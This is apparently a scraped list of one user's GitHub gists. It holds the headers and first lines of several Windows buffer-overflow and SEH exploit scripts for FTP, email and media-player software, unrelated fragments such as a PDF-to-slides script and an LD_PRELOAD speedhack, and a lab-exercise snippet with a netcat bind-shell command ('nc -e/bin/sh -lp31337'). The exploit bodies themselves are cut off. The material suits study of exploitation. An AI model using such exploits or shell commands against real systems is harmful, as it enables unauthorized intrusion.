synap5e / freefloat_ftp_1_lcd_exploit.py
Created November 9, 2012 23:52
Freefloat FTP Server - "lcd" command stack overflow
import sys, socket, struct
# Freefloat FTP Server - "lcd" command stack overflow
# Version 1.0 - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
synap5e / soritong_1_m3u_exploit.py
Created November 10, 2012 21:23
Soritong 1.0 Client side exploit (SEH)
#!/usr/bin/python
import os
# Soritong 1.0 Client side exploit (SEH)
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
synap5e / millennium_mp3_studio_2_mpf_exploit.py
Created November 10, 2012 21:25
Millennium mp3 studio 2 SEH
#!/usr/bin/python
import os
# Millennium mp3 studio 2 SEH ".mpf" client side exploit
# Version 2.0 - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#badchars 00,1a,0d,0e,0f
space = 1280
synap5e / eureka_email_2_2q_egghunter_err_egghunter_exploit.py
Created November 10, 2012 21:27
Eureka Email 2.2q - "-ERR" Egghunter Exploit
import sys, socket, struct
# Eureka Email 2.2q - "-ERR" Egghunter Exploit
# Version 2.2q - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
synap5e / eureka_email_2_2q_err_exploit.py
Created November 10, 2012 21:28
Eureka Email 2.2q - "-ERR" Exploit
import sys, socket, struct
# Eureka Email 2.2q - Exploit (non egghunter)
# Version 2.2q - DEP + ASLR disabled
# Tested: Windows XP SP3 - English
# Author: Simon Pinfold
#
# windows/messagebox - 287 bytes
# http://www.metasploit.com
synap5e / easy_rm_to_mp3_2_7_3_700_dep_aslr_exploit.py
Created November 10, 2012 21:29
Easy RM to MP3 Converter - ".m3u" Windows 7 DEP + ASLR Local Exploit
#!/usr/bin/python
# Easy RM to MP3 Converter - Windows 7 DEP + ASLR Local Exploit
# Version 2.7.3.700 on Windows 7
# Tested: Windows 7 Ultimate SP0 - English
# Author: Simon Pinfold
import struct, os
#!/usr/bin/python
import sys, os
from wand.image import Image
from pptx import Presentation
from pptx.util import Px
pdf = sys.argv[1]
landscape_crops = [
# This array is used to encode and decode the resource files
data_key = [
0x00001092, 0x0000254F, 0x00000348, 0x00014B40, 0x0000241A, 0x00002676,
0x0000007F, 0x00000009, 0x0000250B, 0x0000018A, 0x0000007B, 0x000012E2,
0x00007EBC, 0x00005F23, 0x00000981, 0x00000011, 0x000085BA, 0x0000A566,
0x00001093, 0x0000000E, 0x0002D266, 0x000007C3, 0x00000C16, 0x0000076D,
0x00015D41, 0x000012CD, 0x00000025, 0x0000008F, 0x00000DA2, 0x00004C1B,
0x0000053F, 0x000001B0, 0x00014AFC, 0x000023E0, 0x0000258C, 0x000004D1,
0x00000D6A, 0x0000072F, 0x00000BA8, 0x000007C9, 0x00000BA8, 0x0000131F,
0x000C75C7, 0x0000000D
synap5e / speedhack.cpp
Created February 10, 2014 12:10
A quick hack that allows using LD_PRELOAD for a speedhack
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
// Function-pointer type whose signature matches gettimeofday(2)
// (int (struct timeval *, struct timezone *) from <sys/time.h>).
// NOTE(review): presumably used to hold the real gettimeofday looked up
// through dlsym() (dlfcn.h is included) so the interposed version can
// forward to it — the rest of the file is not visible here; confirm.
typedef int (*go)(struct timeval *tv, struct timezone *tz);
#!/usr/bin/env python2
target = ('127.0.0.1', 20003)
command = ['/bin/nc', '-e/bin/sh', '-lp31337']
"""
ltrace -i -p `ps -Af | grep level03 | grep -v -e grep -e python | tail -n 1 | cut -c 9-16`
echo attach `ps -Af | grep level03 | grep -v -e grep -e python | tail -n 1 | cut -c 9-16` > .gdbinit && gdb -q -iex "set auto-load safe-path /home/simon/Desktop/fusion"
"""